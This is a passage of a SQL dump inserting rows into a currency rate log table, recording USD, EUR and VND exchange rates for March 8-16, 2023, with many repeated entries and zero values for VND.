(678, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-08'),
(679, 1, 'USD', 1.000000, 2, 'EUR', 0.937650, '2023-03-09'),
(680, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-09'),
(681, 2, 'EUR', 1.000000, 1, 'USD', 1.066500, '2023-03-09'),
(682, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-09'),
(683, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-09'),
(684, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-09'),
(685, 1, 'USD', 0.000000, 2, 'EUR', 0.948320, '2023-03-09'),
(686, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-09'),
(687, 2, 'EUR', 0.000000, 1, 'USD', 1.054500, '2023-03-09'),
(688, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-09'),
(689, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-09'),
(690, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-09'),
(691, 1, 'USD', 1.000000, 2, 'EUR', 0.948320, '2023-03-09'),
(692, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-09'),
(693, 2, 'EUR', 1.000000, 1, 'USD', 1.054500, '2023-03-09'),
(694, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-09'),
(695, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-09'),
(696, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-09'),
(697, 1, 'USD', 0.000000, 2, 'EUR', 0.948320, '2023-03-09'),
(698, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-09'),
(699, 2, 'EUR', 0.000000, 1, 'USD', 1.054500, '2023-03-09'),
(700, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-09'),
(701, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-09'),
(702, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-09'),
(703, 1, 'USD', 1.000000, 2, 'EUR', 0.948320, '2023-03-09'),
(704, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-09'),
(705, 2, 'EUR', 1.000000, 1, 'USD', 1.054500, '2023-03-09'),
(706, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-09'),
(707, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-09'),
(708, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-09'),
(709, 1, 'USD', 0.000000, 2, 'EUR', 0.948320, '2023-03-09'),
(710, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-09'),
(711, 2, 'EUR', 0.000000, 1, 'USD', 1.054500, '2023-03-09'),
(712, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-09'),
(713, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-09'),
(714, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-09'),
(715, 1, 'USD', 1.000000, 2, 'EUR', 0.948320, '2023-03-09'),
(716, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-09'),
(717, 2, 'EUR', 1.000000, 1, 'USD', 1.054500, '2023-03-09'),
(718, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-09'),
(719, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-09'),
(720, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-09'),
(721, 1, 'USD', 0.000000, 2, 'EUR', 0.948320, '2023-03-09'),
(722, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-09'),
(723, 2, 'EUR', 0.000000, 1, 'USD', 1.054500, '2023-03-09'),
(724, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-09'),
(725, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-09'),
(726, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-09'),
(727, 1, 'USD', 1.000000, 2, 'EUR', 0.948320, '2023-03-10'),
(728, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-10'),
(729, 2, 'EUR', 1.000000, 1, 'USD', 1.054500, '2023-03-10'),
(730, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-10'),
(731, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-10'),
(732, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-10'),
(733, 1, 'USD', 0.000000, 2, 'EUR', 0.947510, '2023-03-10'),
(734, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-10'),
(735, 2, 'EUR', 0.000000, 1, 'USD', 1.055400, '2023-03-10'),
(736, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-10'),
(737, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-10'),
(738, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-10'),
(739, 1, 'USD', 1.000000, 2, 'EUR', 0.947510, '2023-03-10'),
(740, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-10'),
(741, 2, 'EUR', 1.000000, 1, 'USD', 1.055400, '2023-03-10'),
(742, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-10'),
(743, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-10'),
(744, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-10'),
(745, 1, 'USD', 0.000000, 2, 'EUR', 0.947510, '2023-03-10'),
(746, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-10'),
(747, 2, 'EUR', 0.000000, 1, 'USD', 1.055400, '2023-03-10'),
(748, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-10'),
(749, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-10'),
(750, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-10'),
(751, 1, 'USD', 1.000000, 2, 'EUR', 0.947510, '2023-03-10'),
(752, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-10'),
(753, 2, 'EUR', 1.000000, 1, 'USD', 1.055400, '2023-03-10'),
(754, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-10'),
(755, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-10'),
(756, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-10'),
(757, 1, 'USD', 0.000000, 2, 'EUR', 0.947510, '2023-03-10'),
(758, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-10'),
(759, 2, 'EUR', 0.000000, 1, 'USD', 1.055400, '2023-03-10'),
(760, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-10'),
(761, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-10'),
(762, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-10'),
(763, 1, 'USD', 1.000000, 2, 'EUR', 0.947510, '2023-03-10'),
(764, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-10'),
(765, 2, 'EUR', 1.000000, 1, 'USD', 1.055400, '2023-03-10'),
(766, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-10'),
(767, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-10'),
(768, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-10'),
(769, 1, 'USD', 0.000000, 2, 'EUR', 0.947510, '2023-03-10'),
(770, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-10'),
(771, 2, 'EUR', 0.000000, 1, 'USD', 1.055400, '2023-03-10'),
(772, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-10'),
(773, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-10'),
(774, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-10'),
(775, 1, 'USD', 1.000000, 2, 'EUR', 0.947510, '2023-03-11'),
(776, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-11'),
(777, 2, 'EUR', 1.000000, 1, 'USD', 1.055400, '2023-03-11'),
(778, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-11'),
(779, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-11'),
(780, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-11'),
(781, 1, 'USD', 0.000000, 2, 'EUR', 0.944640, '2023-03-11'),
(782, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-11'),
(783, 2, 'EUR', 0.000000, 1, 'USD', 1.058600, '2023-03-11'),
(784, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-11'),
(785, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-11'),
(786, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-11'),
(787, 1, 'USD', 1.000000, 2, 'EUR', 0.944640, '2023-03-11'),
(788, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-11'),
(789, 2, 'EUR', 1.000000, 1, 'USD', 1.058600, '2023-03-11'),
(790, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-11'),
(791, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-11'),
(792, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-11'),
(793, 1, 'USD', 0.000000, 2, 'EUR', 0.944640, '2023-03-11'),
(794, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-11'),
(795, 2, 'EUR', 0.000000, 1, 'USD', 1.058600, '2023-03-11'),
(796, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-11'),
(797, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-11'),
(798, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-11'),
(799, 1, 'USD', 1.000000, 2, 'EUR', 0.944640, '2023-03-11'),
(800, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-11'),
(801, 2, 'EUR', 1.000000, 1, 'USD', 1.058600, '2023-03-11'),
(802, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-11'),
(803, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-11'),
(804, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-11'),
(805, 1, 'USD', 0.000000, 2, 'EUR', 0.944640, '2023-03-11'),
(806, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-11'),
(807, 2, 'EUR', 0.000000, 1, 'USD', 1.058600, '2023-03-11'),
(808, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-11'),
(809, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-11'),
(810, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-11'),
(811, 1, 'USD', 1.000000, 2, 'EUR', 0.944640, '2023-03-11'),
(812, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-11'),
(813, 2, 'EUR', 1.000000, 1, 'USD', 1.058600, '2023-03-11'),
(814, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-11'),
(815, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-11'),
(816, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-11'),
(817, 1, 'USD', 0.000000, 2, 'EUR', 0.944640, '2023-03-11'),
(818, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-11'),
(819, 2, 'EUR', 0.000000, 1, 'USD', 1.058600, '2023-03-11'),
(820, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-11'),
(821, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-11'),
(822, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-11'),
(823, 1, 'USD', 1.000000, 2, 'EUR', 0.944640, '2023-03-12'),
(824, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-12'),
(825, 2, 'EUR', 1.000000, 1, 'USD', 1.058600, '2023-03-12'),
(826, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-12'),
(827, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-12'),
(828, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-12'),
(829, 1, 'USD', 0.000000, 2, 'EUR', 0.944640, '2023-03-12'),
(830, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-12'),
(831, 2, 'EUR', 0.000000, 1, 'USD', 1.058600, '2023-03-12'),
(832, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-12'),
(833, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-12'),
(834, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-12'),
(835, 1, 'USD', 1.000000, 2, 'EUR', 0.944640, '2023-03-12'),
(836, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-12'),
(837, 2, 'EUR', 1.000000, 1, 'USD', 1.058600, '2023-03-12'),
(838, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-12'),
(839, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-12'),
(840, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-12'),
(841, 1, 'USD', 0.000000, 2, 'EUR', 0.944640, '2023-03-12'),
(842, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-12'),
(843, 2, 'EUR', 0.000000, 1, 'USD', 1.058600, '2023-03-12'),
(844, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-12'),
(845, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-12'),
(846, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-12');
INSERT INTO `tblcurrency_rate_logs` (`id`, `from_currency_id`, `from_currency_name`, `from_currency_rate`, `to_currency_id`, `to_currency_name`, `to_currency_rate`, `date`) VALUES
(847, 1, 'USD', 1.000000, 2, 'EUR', 0.944640, '2023-03-12'),
(848, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-12'),
(849, 2, 'EUR', 1.000000, 1, 'USD', 1.058600, '2023-03-12'),
(850, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-12'),
(851, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-12'),
(852, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-12'),
(853, 1, 'USD', 0.000000, 2, 'EUR', 0.944640, '2023-03-12'),
(854, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-12'),
(855, 2, 'EUR', 0.000000, 1, 'USD', 1.058600, '2023-03-12'),
(856, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-12'),
(857, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-12'),
(858, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-12'),
(859, 1, 'USD', 1.000000, 2, 'EUR', 0.944640, '2023-03-12'),
(860, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-12'),
(861, 2, 'EUR', 1.000000, 1, 'USD', 1.058600, '2023-03-12'),
(862, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-12'),
(863, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-12'),
(864, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-12'),
(865, 1, 'USD', 0.000000, 2, 'EUR', 0.944640, '2023-03-12'),
(866, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-12'),
(867, 2, 'EUR', 0.000000, 1, 'USD', 1.058600, '2023-03-12'),
(868, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-12'),
(869, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-12'),
(870, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-12'),
(871, 1, 'USD', 1.000000, 2, 'EUR', 0.944640, '2023-03-13'),
(872, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-13'),
(873, 2, 'EUR', 1.000000, 1, 'USD', 1.058600, '2023-03-13'),
(874, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-13'),
(875, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-13'),
(876, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-13'),
(877, 1, 'USD', 0.000000, 2, 'EUR', 0.944640, '2023-03-13'),
(878, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-13'),
(879, 2, 'EUR', 0.000000, 1, 'USD', 1.058600, '2023-03-13'),
(880, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-13'),
(881, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-13'),
(882, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-13'),
(883, 1, 'USD', 1.000000, 2, 'EUR', 0.944640, '2023-03-13'),
(884, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-13'),
(885, 2, 'EUR', 1.000000, 1, 'USD', 1.058600, '2023-03-13'),
(886, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-13'),
(887, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-13'),
(888, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-13'),
(889, 1, 'USD', 0.000000, 2, 'EUR', 0.944640, '2023-03-13'),
(890, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-13'),
(891, 2, 'EUR', 0.000000, 1, 'USD', 1.058600, '2023-03-13'),
(892, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-13'),
(893, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-13'),
(894, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-13'),
(895, 1, 'USD', 1.000000, 2, 'EUR', 0.944640, '2023-03-13'),
(896, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-13'),
(897, 2, 'EUR', 1.000000, 1, 'USD', 1.058600, '2023-03-13'),
(898, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-13'),
(899, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-13'),
(900, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-13'),
(901, 1, 'USD', 0.000000, 2, 'EUR', 0.944640, '2023-03-13'),
(902, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-13'),
(903, 2, 'EUR', 0.000000, 1, 'USD', 1.058600, '2023-03-13'),
(904, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-13'),
(905, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-13'),
(906, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-13'),
(907, 1, 'USD', 1.000000, 2, 'EUR', 0.944640, '2023-03-13'),
(908, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-13'),
(909, 2, 'EUR', 1.000000, 1, 'USD', 1.058600, '2023-03-13'),
(910, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-13'),
(911, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-13'),
(912, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-13'),
(913, 1, 'USD', 0.000000, 2, 'EUR', 0.944640, '2023-03-13'),
(914, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-13'),
(915, 2, 'EUR', 0.000000, 1, 'USD', 1.058600, '2023-03-13'),
(916, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-13'),
(917, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-13'),
(918, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-13'),
(919, 1, 'USD', 1.000000, 2, 'EUR', 0.944640, '2023-03-14'),
(920, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-14'),
(921, 2, 'EUR', 1.000000, 1, 'USD', 1.058600, '2023-03-14'),
(922, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-14'),
(923, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-14'),
(924, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-14'),
(925, 1, 'USD', 0.000000, 2, 'EUR', 0.934060, '2023-03-14'),
(926, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-14'),
(927, 2, 'EUR', 0.000000, 1, 'USD', 1.070600, '2023-03-14'),
(928, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-14'),
(929, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-14'),
(930, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-14'),
(931, 1, 'USD', 1.000000, 2, 'EUR', 0.934060, '2023-03-14'),
(932, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-14'),
(933, 2, 'EUR', 1.000000, 1, 'USD', 1.070600, '2023-03-14'),
(934, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-14'),
(935, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-14'),
(936, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-14'),
(937, 1, 'USD', 0.000000, 2, 'EUR', 0.934060, '2023-03-14'),
(938, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-14'),
(939, 2, 'EUR', 0.000000, 1, 'USD', 1.070600, '2023-03-14'),
(940, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-14'),
(941, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-14'),
(942, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-14'),
(943, 1, 'USD', 1.000000, 2, 'EUR', 0.934060, '2023-03-14'),
(944, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-14'),
(945, 2, 'EUR', 1.000000, 1, 'USD', 1.070600, '2023-03-14'),
(946, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-14'),
(947, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-14'),
(948, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-14'),
(949, 1, 'USD', 0.000000, 2, 'EUR', 0.934060, '2023-03-14'),
(950, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-14'),
(951, 2, 'EUR', 0.000000, 1, 'USD', 1.070600, '2023-03-14'),
(952, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-14'),
(953, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-14'),
(954, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-14'),
(955, 1, 'USD', 1.000000, 2, 'EUR', 0.934060, '2023-03-14'),
(956, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-14'),
(957, 2, 'EUR', 1.000000, 1, 'USD', 1.070600, '2023-03-14'),
(958, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-14'),
(959, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-14'),
(960, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-14'),
(961, 1, 'USD', 0.000000, 2, 'EUR', 0.934060, '2023-03-14'),
(962, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-14'),
(963, 2, 'EUR', 0.000000, 1, 'USD', 1.070600, '2023-03-14'),
(964, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-14'),
(965, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-14'),
(966, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-14'),
(967, 1, 'USD', 1.000000, 2, 'EUR', 0.934060, '2023-03-15'),
(968, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-15'),
(969, 2, 'EUR', 1.000000, 1, 'USD', 1.070600, '2023-03-15'),
(970, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-15'),
(971, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-15'),
(972, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-15'),
(973, 1, 'USD', 0.000000, 2, 'EUR', 0.931360, '2023-03-15'),
(974, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-15'),
(975, 2, 'EUR', 0.000000, 1, 'USD', 1.073700, '2023-03-15'),
(976, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-15'),
(977, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-15'),
(978, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-15'),
(979, 1, 'USD', 1.000000, 2, 'EUR', 0.931360, '2023-03-15'),
(980, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-15'),
(981, 2, 'EUR', 1.000000, 1, 'USD', 1.073700, '2023-03-15'),
(982, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-15'),
(983, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-15'),
(984, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-15'),
(985, 1, 'USD', 0.000000, 2, 'EUR', 0.931360, '2023-03-15'),
(986, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-15'),
(987, 2, 'EUR', 0.000000, 1, 'USD', 1.073700, '2023-03-15'),
(988, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-15'),
(989, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-15'),
(990, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-15'),
(991, 1, 'USD', 1.000000, 2, 'EUR', 0.931360, '2023-03-15'),
(992, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-15'),
(993, 2, 'EUR', 1.000000, 1, 'USD', 1.073700, '2023-03-15'),
(994, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-15'),
(995, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-15'),
(996, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-15'),
(997, 1, 'USD', 0.000000, 2, 'EUR', 0.931360, '2023-03-15'),
(998, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-15'),
(999, 2, 'EUR', 0.000000, 1, 'USD', 1.073700, '2023-03-15'),
(1000, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-15'),
(1001, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-15'),
(1002, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-15'),
(1003, 1, 'USD', 1.000000, 2, 'EUR', 0.931360, '2023-03-15'),
(1004, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-15'),
(1005, 2, 'EUR', 1.000000, 1, 'USD', 1.073700, '2023-03-15'),
(1006, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-15'),
(1007, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-15'),
(1008, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-15'),
(1009, 1, 'USD', 0.000000, 2, 'EUR', 0.931360, '2023-03-15'),
(1010, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-15'),
(1011, 2, 'EUR', 0.000000, 1, 'USD', 1.073700, '2023-03-15'),
(1012, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-15'),
(1013, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-15'),
(1014, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-15'),
(1015, 1, 'USD', 1.000000, 2, 'EUR', 0.931360, '2023-03-16'),
(1016, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-16'),
(1017, 2, 'EUR', 1.000000, 1, 'USD', 1.073700, '2023-03-16'),
(1018, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-16'),
(1019, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-16'),
(1020, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-16'),
(1021, 1, 'USD', 0.000000, 2, 'EUR', 0.947960, '2023-03-16'),
(1022, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-16'),
(1023, 2, 'EUR', 0.000000, 1, 'USD', 1.054900, '2023-03-16'),
(1024, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-03-16'),
(1025, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-03-16'),
(1026, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-03-16'),
(1027, 1, 'USD', 1.000000, 2, 'EUR', 0.947960, '2023-03-16'),
(1028, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-03-16'),
(1029, 2, 'EUR', 1.000000, 1, 'USD', 1.054900, '2023-03-16'),
(1030, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-03-16'),
(1031, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-03-16'),
(1032, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-03-16'),
(1033, 1, 'USD', 0.000000, 2, 'EUR', 0.947960, '2023-03-16'),
(1034, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-03-16'),
